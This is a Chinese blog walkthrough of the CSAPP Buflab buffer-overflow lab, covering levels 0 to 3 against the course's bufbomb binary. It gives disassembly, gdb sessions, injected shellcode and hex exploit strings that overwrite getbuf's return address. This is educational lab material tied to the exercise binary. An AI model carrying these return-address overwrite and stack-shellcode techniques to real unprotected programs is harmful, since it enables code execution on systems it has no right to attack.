<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sekla.cn","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="CSAPP-BOMBLAB缓冲区溢出实验。本实验为32位CSAPP第二版的实验，新版实验为attacklab，本质原理还是一样的。 实验环境Ubuntu 32bit">
<meta property="og:type" content="article">
<meta property="og:title" content="CSAPP-Buflab">
<meta property="og:url" content="http://sekla.cn/2021/05/30/csapp-buflab/index.html">
<meta property="og:site_name" content="Sekla&#39;s Blog">
<meta property="og:description" content="CSAPP-BOMBLAB缓冲区溢出实验。本实验为32位CSAPP第二版的实验，新版实验为attacklab，本质原理还是一样的。 实验环境Ubuntu 32bit">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/07/13/LchTUMXt4uwkgr6.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/aO7iM8GBIlZJ9Yk.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/OAri3gywKo7fBWa.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/DfsJnxzuAkdWRa5.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/RD46WqfgZ7bQGMS.png">
<meta property="og:image" content="https://i.loli.net/2021/06/02/luRbIY1AHPQXWME.png">
<meta property="og:image" content="https://i.loli.net/2021/06/03/9IOMdJfcBT2okSV.png">
<meta property="article:published_time" content="2021-05-30T11:00:00.000Z">
<meta property="article:modified_time" content="2021-10-18T14:39:26.255Z">
<meta property="article:author" content="Sekla">
<meta property="article:tag" content="gdb">
<meta property="article:tag" content="汇编">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/07/13/LchTUMXt4uwkgr6.png">

<link rel="canonical" href="http://sekla.cn/2021/05/30/csapp-buflab/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CSAPP-Buflab | Sekla's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  <script type="text/javascript" src="/js/my_js/clicklove.js"></script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Sekla's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Keep Learning Keep Doing</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">23</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">100</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://sekla.cn/2021/05/30/csapp-buflab/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Sekla">
      <meta itemprop="description" content="Sekla">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sekla's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CSAPP-Buflab
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-05-30 19:00:00" itemprop="dateCreated datePublished" datetime="2021-05-30T19:00:00+08:00">2021-05-30</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-10-18 22:39:26" itemprop="dateModified" datetime="2021-10-18T22:39:26+08:00">2021-10-18</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9F/" itemprop="url" rel="index"><span itemprop="name">计算机系统</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B3%BB%E7%BB%9F/CSAPP%E5%AE%9E%E9%AA%8C%E7%B3%BB%E5%88%97/" itemprop="url" rel="index"><span itemprop="name">CSAPP实验系列</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>9.6k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>9 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="CSAPP-BOMBLAB"><a href="#CSAPP-BOMBLAB" class="headerlink" title="CSAPP-BOMBLAB"></a>CSAPP-BOMBLAB</h1><p>缓冲区溢出实验。本实验为32位CSAPP第二版的实验，新版实验为attacklab，本质原理还是一样的。</p>
<h2 id="实验环境"><a href="#实验环境" class="headerlink" title="实验环境"></a>实验环境</h2><p>Ubuntu 32bit</p>
<a id="more"></a>

<h2 id="实验内容"><a href="#实验内容" class="headerlink" title="实验内容"></a>实验内容</h2><h3 id="pre"><a href="#pre" class="headerlink" title="pre"></a>pre</h3><h4 id="cookie"><a href="#cookie" class="headerlink" title="cookie"></a>cookie</h4><p>本实验的答案基于每个人不同的userid不一样，首先可以使用makecookie生成一段cookie，实验中需要让cookie出现在程序中本不该出现的位置。</p>
<h4 id="getbuf"><a href="#getbuf" class="headerlink" title="getbuf"></a>getbuf</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Buffer size for getbuf */</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> NORMAL_BUFFER_SIZE 32</span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">getbuf</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line"><span class="keyword">char</span> buf[NORMAL_BUFFER_SIZE];</span><br><span class="line">Gets(buf);</span><br><span class="line"><span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>程序的读取函数如上，首先函数定义了在栈上申请的大小为32，Gets函数不会中途停止，无论输入的字符串多大，只会把整个字符串输入。如果输入字符串长度小于等于31，则函数返回1。超过32也会报错。</p>
<h4 id="hex2raw"><a href="#hex2raw" class="headerlink" title="hex2raw"></a>hex2raw</h4><p>改程序可以帮助我们将应该输入的字符串(不匹配ASCII)变成我们应该输入的raw串。需要住的是攻击字符串不能包含0x0A，因为这是换行符(‘ \n ‘)的ASCII码。当Gets遇到此字节时，它将假定您打算这样做终止的字符串。</p>
<h4 id="函数过程调用原理"><a href="#函数过程调用原理" class="headerlink" title="函数过程调用原理"></a>函数过程调用原理</h4><p>借用网图：</p>
<p><img src="https://i.loli.net/2021/07/13/LchTUMXt4uwkgr6.png" alt="函数过程调用"></p>
<h3 id="lv0-Candle"><a href="#lv0-Candle" class="headerlink" title="lv0.Candle"></a>lv0.Candle</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">test</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> val;</span><br><span class="line">	<span class="comment">/* Put canary on stack to detect possible corruption */</span></span><br><span class="line">	<span class="keyword">volatile</span> <span class="keyword">int</span> local = uniqueval();</span><br><span class="line"> </span><br><span class="line">	val = getbuf();</span><br><span class="line"> </span><br><span class="line">	<span class="comment">/* Check for corrupted stack */</span></span><br><span class="line">	<span class="keyword">if</span> (local != uniqueval()) &#123;</span><br><span class="line">		<span class="built_in">printf</span>(<span class="string">&quot;Sabotaged!: the stack has been corrupted\n&quot;</span>);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span> <span class="keyword">if</span> (val == cookie) &#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Boom!: getbuf returned 0x%x\n&quot;</span>, val);</span><br><span class="line">	validate(<span class="number">3</span>);</span><br><span class="line">	&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Dud: getbuf returned 0x%x\n&quot;</span>, val);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>函数getbuf在程序内部背一个test函数调用，以上为test的函数代码，当getbuf函数执行返回语句，程序通常为继续执行在函数test中第七行，现在要改变这个行为，提供了一个函数smoke：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">smoke</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Smoke!: You called smoke()\n&quot;</span>);</span><br><span class="line">	validate(<span class="number">0</span>);</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>现在的任务是让程序运行时在getbuf函数执行返回语句时执行smoke代码，而不是返回test函数，输入的爆破字符串可能会损坏函数堆栈，但这没关系。</p>
<p>首先反汇编bufbomb程序，找到smoke函数的汇编代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">08048e0a &lt;smoke&gt;:</span><br></pre></td></tr></table></figure>

<p>以及getbuf的汇编代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">08049262 &lt;getbuf&gt;:</span><br><span class="line"> 8049262:	55                   	push   %ebp</span><br><span class="line"> 8049263:	89 e5                	mov    %esp,%ebp</span><br><span class="line"> 8049265:	83 ec 38             	sub    $0x38,%esp</span><br><span class="line"> 8049268:	8d 45 d8             	lea    -0x28(%ebp),%eax</span><br><span class="line"> 804926b:	89 04 24             	mov    %eax,(%esp)</span><br><span class="line"> 804926e:	e8 bf f9 ff ff       	call   8048c32 &lt;Gets&gt;</span><br><span class="line"> 8049273:	b8 01 00 00 00       	mov    $0x1,%eax</span><br><span class="line"> 8049278:	c9                   	leave  </span><br><span class="line"> 8049279:	c3                   	ret    </span><br><span class="line"> 804927a:	90                   	nop</span><br><span class="line"> 804927b:	90                   	nop</span><br><span class="line"> 804927c:	90                   	nop</span><br><span class="line"> 804927d:	90                   	nop</span><br><span class="line"> 804927e:	90                   	nop</span><br><span class="line"> 804927f:	90                   	nop</span><br></pre></td></tr></table></figure>

<p>Gets()函数帧栈大小为0x28，0x28+8存储的即为函数返回地址。只要将smoke函数的地址写入getbuf的返回地址即可，即0x08048e0a。</p>
<p>前44个字节随意填充，最后4个字节用小端法写成smoke的跳转地址。</p>
<p>按照规则写好level0.txt:</p>
<p><code>00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00 0b 8e 04 08</code></p>
<p>由于txt文件中不能写入0x0a然而smoke函数的地址入口正好包含0x0a，只能加大一个字节变成0x08048e0b。</p>
<p>输入：</p>
<p><code>cat level0.txt | ./hex2raw | ./bufbomb -u sekla</code>即可。</p>
<p>结果：</p>
<p><img src="https://i.loli.net/2021/06/02/aO7iM8GBIlZJ9Yk.png" alt="level0"></p>
<h3 id="lv1-Sparkler"><a href="#lv1-Sparkler" class="headerlink" title="lv1.Sparkler"></a>lv1.Sparkler</h3><p>提供了一个fizz函数：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">fizz</span><span class="params">(<span class="keyword">int</span> val)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (val == cookie) &#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Fizz!: You called fizz(0x%x)\n&quot;</span>, val);</span><br><span class="line">	validate(<span class="number">1</span>);</span><br><span class="line">&#125; <span class="keyword">else</span></span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Misfire: You called fizz(0x%x)\n&quot;</span>, val);</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>从代码中可以发现，fizz函数验证了cookie值，其他和lv0类似，找到fizz函数的汇编代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">08048daf &lt;fizz&gt;</span><br></pre></td></tr></table></figure>

<p>根据帧栈图，函数入口为0x08048daf，与lv0相同，ebp+4存放了调用者的返回地址，所以cookie作为参数地址应该为ebp+8，所以将cookie放在这里。</p>
<p>编写exploit string：</p>
<p><code>00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00 00 00 00 00  af 8d 04 08 00 00 00 00 5d ea 3b 37</code></p>
<p>验证：</p>
<p><img src="https://i.loli.net/2021/06/02/OAri3gywKo7fBWa.png" alt="level1"></p>
<h3 id="lv2-Firecracker"><a href="#lv2-Firecracker" class="headerlink" title="lv2.Firecracker"></a>lv2.Firecracker</h3><p>本体开始需要在结构中对机器进行编码，利用字符串用写好的指令的起始地址覆盖返回指针，当getbuf函数执行ret指令时，程序开始执行堆栈上的指令，而不是返回。主要就是把返回地址设置成exploit code代码的地址入口。</p>
<p>首先提供bang函数代码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">int</span> global_value = <span class="number">0</span>;</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">bang</span><span class="params">(<span class="keyword">int</span> val)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">if</span> (global_value == cookie) &#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Bang!: You set global_value to 0x%x\n&quot;</span>, global_value);</span><br><span class="line">	validate(<span class="number">2</span>);</span><br><span class="line">&#125; <span class="keyword">else</span></span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">&quot;Misfire: global_value = 0x%x\n&quot;</span>, global_value);</span><br><span class="line">	<span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>与lv0，lv1类似，将返回地址设置成bang函数入口地址，同时还需要设置global_value为自己的cookie值，exploit  </p>
<p>string应当包含修改global_value的代码，并将bang的入口地址入栈。</p>
<p>bang函数的反汇编代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">08048d52 &lt;bang&gt;:</span><br><span class="line"> 8048d52:	55                   	push   %ebp</span><br><span class="line"> 8048d53:	89 e5                	mov    %esp,%ebp</span><br><span class="line"> 8048d55:	83 ec 18             	sub    $0x18,%esp</span><br><span class="line"> 8048d58:	a1 0c d1 04 08       	mov    0x804d10c,%eax</span><br><span class="line"> 8048d5d:	3b 05 04 d1 04 08    	cmp    0x804d104,%eax</span><br><span class="line"> 8048d63:	75 26                	jne    8048d8b &lt;bang+0x39&gt;</span><br><span class="line"> 8048d65:	89 44 24 08          	mov    %eax,0x8(%esp)</span><br><span class="line"> 8048d69:	c7 44 24 04 ac a4 04 	movl   $0x804a4ac,0x4(%esp)</span><br><span class="line"> 8048d70:	08 </span><br><span class="line"> 8048d71:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)</span><br><span class="line"> 8048d78:	e8 13 fc ff ff       	call   8048990 &lt;__printf_chk@plt&gt;</span><br><span class="line"> 8048d7d:	c7 04 24 02 00 00 00 	movl   $0x2,(%esp)</span><br><span class="line"> 8048d84:	e8 f7 04 00 00       	call   8049280 &lt;validate&gt;</span><br><span class="line"> 8048d89:	eb 18                	jmp    8048da3 &lt;bang+0x51&gt;</span><br><span class="line"> 8048d8b:	89 44 24 08          	mov    %eax,0x8(%esp)</span><br><span class="line"> 8048d8f:	c7 44 24 04 c2 a2 04 	movl   $0x804a2c2,0x4(%esp)</span><br><span class="line"> 8048d96:	08 </span><br><span class="line"> 8048d97:	c7 04 24 01 00 00 00 	movl   $0x1,(%esp)</span><br><span class="line"> 8048d9e:	e8 ed fb ff ff       	call   8048990 &lt;__printf_chk@plt&gt;</span><br><span class="line"> 8048da3:	c7 04 24 00 00 00 00 	movl   $0x0,(%esp)</span><br><span class="line"> 8048daa:	e8 21 fb ff ff       	call   80488d0 &lt;exit@plt&gt;</span><br></pre></td></tr></table></figure>

<p>得到bang函数的入口地址和global_value的地址即0x804d10c。</p>
<p>所以需要写下汇编代码，将自己的cookie写入全局变量的地址中，然后把bang函数地址入栈。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">movl $0x373bea5d,0x804d10c</span><br><span class="line">push $0x08048d52</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>还要将汇编代码转换成机器代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">00000000 &lt;.text&gt;:</span><br><span class="line">   0:	c7 05 0c d1 04 08 5d 	movl   $0x373bea5d,0x804d10c</span><br><span class="line">   7:	ea 3b 37 </span><br><span class="line">   a:	68 52 8d 04 08       	push   $0x8048d52</span><br><span class="line">   f:	c3                   	ret    </span><br></pre></td></tr></table></figure>

<p>根据手册指导，最后得到以上机器代码。现在我们需要让机器执行这一段代码，所以我们需要在getbuf执行时将其返回地址修改成这段代码的入口地址，执行完getbuf后就可以自动执行我们自己写的代码。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">08049262 &lt;getbuf&gt;:</span><br><span class="line"> 8049262:	55                   	push   %ebp</span><br><span class="line"> 8049263:	89 e5                	mov    %esp,%ebp</span><br><span class="line"> 8049265:	83 ec 38             	sub    $0x38,%esp</span><br><span class="line"> 8049268:	8d 45 d8             	lea    -0x28(%ebp),%eax</span><br><span class="line"> 804926b:	89 04 24             	mov    %eax,(%esp)</span><br><span class="line"> 804926e:	e8 bf f9 ff ff       	call   8048c32 &lt;Gets&gt;</span><br><span class="line"> 8049273:	b8 01 00 00 00       	mov    $0x1,%eax</span><br><span class="line"> 8049278:	c9                   	leave  </span><br><span class="line"> 8049279:	c3                   	ret    </span><br><span class="line"> 804927a:	90                   	nop</span><br><span class="line"> 804927b:	90                   	nop</span><br><span class="line"> 804927c:	90                   	nop</span><br><span class="line"> 804927d:	90                   	nop</span><br><span class="line"> 804927e:	90                   	nop</span><br><span class="line"> 804927f:	90                   	nop</span><br></pre></td></tr></table></figure>

<p>再来看看getbuf的汇编代码， 我们发现在call Gets指令之前，机器将我们要写入的字符串地址加载到eax寄存器中，直接上gdb调试查看eax的值。</p>
<p><img src="https://i.loli.net/2021/06/02/DfsJnxzuAkdWRa5.png" alt="lv3_reg"> </p>
<p>地址为0x55683048，现在就可以写exploit string了：</p>
<p><code>c7 05 0c d1 04 08 5d ea 3b 37 68 52 8d 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 30 68 55</code></p>
<p>验证：</p>
<p><img src="https://i.loli.net/2021/06/02/RD46WqfgZ7bQGMS.png" alt="level3"></p>
<h3 id="lv3-Dynamite"><a href="#lv3-Dynamite" class="headerlink" title="lv3:Dynamite"></a>lv3:Dynamite</h3><p>本阶段与以上几个阶段不同的是：需要恢复改变我们改变寄存器的值，并且执行ret返回到test函数中且cookie要作为返回值。</p>
<p>首先需要知道修改了哪些寄存器，首先%ebp的值肯定被修改，所以需要恢复%ebp的值。</p>
<p>同上一阶段相同设置断点在test函数调用getbuf函数之后并查看寄存器的值。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">(gdb) b *0x8048e50</span><br><span class="line">Breakpoint 1 at 0x8048e50</span><br><span class="line">(gdb) r -u sekla</span><br><span class="line">Starting program: &#x2F;home&#x2F;ubuntu&#x2F;lab3&#x2F;buflab-handout&#x2F;bufbomb -u sekla</span><br><span class="line">Userid: sekla</span><br><span class="line">Cookie: 0x373bea5d</span><br><span class="line">Type string:baka   </span><br><span class="line"></span><br><span class="line">Breakpoint 1, 0x08048e50 in test ()</span><br><span class="line">(gdb) i r</span><br><span class="line">eax            0x1	1</span><br><span class="line">ecx            0xa	10</span><br><span class="line">edx            0xb7fc88c4	-1208186684</span><br><span class="line">ebx            0x0	0</span><br><span class="line">esp            0x55683078	0x55683078</span><br><span class="line">ebp            0x556830a0	0x556830a0</span><br><span class="line">esi            0x55686018	1432903704</span><br><span class="line">edi            0xf30	3888</span><br><span class="line">eip            0x8048e50	0x8048e50 &lt;test+20&gt;</span><br><span class="line">eflags         0x216	[ PF AF IF ]</span><br><span class="line">cs             0x73	115</span><br><span class="line">ss             0x7b	123</span><br><span class="line">ds             0x7b	123</span><br><span class="line">es             0x7b	123</span><br><span class="line">fs             0x0	0</span><br><span class="line">gs             0x33	51</span><br></pre></td></tr></table></figure>

<p>ebp的值为0x556830a0，然后就和上一关套路一样。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">movl $0x373bea5d,%eax</span><br><span class="line">push $0x08048e50</span><br><span class="line">ret</span><br><span class="line"></span><br><span class="line">#反汇编:</span><br><span class="line">00000000 &lt;.text&gt;:</span><br><span class="line">   0:	b8 5d ea 3b 37       	mov    $0x373bea5d,%eax</span><br><span class="line">   5:	68 50 8e 04 08       	push   $0x8048e50</span><br><span class="line">   a:	c3                   	ret    </span><br></pre></td></tr></table></figure>

<p>在攻击字符串中设置ebp的值。</p>
<p>level3.txt:</p>
<p><code>b8 5d ea 3b 37 68 50 8e 04 08 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 30 68 55 48 30 68 55</code></p>
<p>验证：</p>
<p><code>cat level3.txt | ./hex2raw | ./bufbomb -u sekla</code></p>
